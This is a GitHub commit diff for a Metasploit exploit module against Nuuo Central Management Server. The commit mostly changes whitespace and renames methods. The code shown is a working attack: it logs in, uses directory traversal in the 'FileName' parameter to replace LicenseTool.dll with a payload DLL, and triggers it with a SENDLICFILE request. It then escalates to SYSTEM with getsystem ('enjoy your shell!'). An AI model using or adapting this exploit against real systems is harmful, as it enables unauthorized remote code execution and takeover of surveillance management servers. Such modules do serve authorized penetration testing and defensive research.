Update nuuo_cms_fu.rb
Pedro Ribeiro
GitHub
parent
0685ebed76
commit
4e1d79ac4b
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
|
||||
'Description' => %q{
|
||||
The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
|
||||
CMS Server.
|
||||
CMS Server.
|
||||
The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
|
||||
characters. Therefore, this function can be abused to overwrite any files in the installation
|
||||
drive of CMS Server.
|
||||
|
|
@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
print_warning("Please wait a bit while we clean up")
|
||||
print_warning("Please wait a bit while we clean up")
|
||||
client.sys.process.get_processes().each do |proc|
|
||||
if proc['name'] == "NCS_Server.exe"
|
||||
client.sys.process.kill(proc['pid'])
|
||||
|
|
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("Successfully restored LicenseTool.dll!")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# elevate privs to system (we're already Admin anyway), and we're done!
|
||||
client.run_cmd("getsystem")
|
||||
print_good("We should have SYSTEM now, enjoy your shell!")
|
||||
|
|
@ -71,30 +71,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("Anyway, enjoy your shell!")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
login
|
||||
|
||||
if @session == nil
|
||||
def exploit
|
||||
nucs_login
|
||||
|
||||
if @nucs_session == nil
|
||||
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
|
||||
end
|
||||
|
||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||
# and not nuke the CMS installation.
|
||||
@dll = rand_text_alpha(12)
|
||||
print_status("Backing up LicenseTool.dll to #{@dll}")
|
||||
dll_data = download_file("LicenseTool.dll")
|
||||
upload_file(@dll, dll_data)
|
||||
|
||||
dll_data = nucs_download_file("LicenseTool.dll")
|
||||
nucs_upload_file(@dll, dll_data)
|
||||
|
||||
print_status("Uploading payload...")
|
||||
upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
|
||||
print_status("Sleeping 15 seconds...")
|
||||
sleep 15
|
||||
|
||||
print_status("Sending SENDLICFILE request, shell incoming!")
|
||||
license_data = rand_text_alpha(50..350)
|
||||
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
"Content-Length: " + license_data.length.to_s], license_data)
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue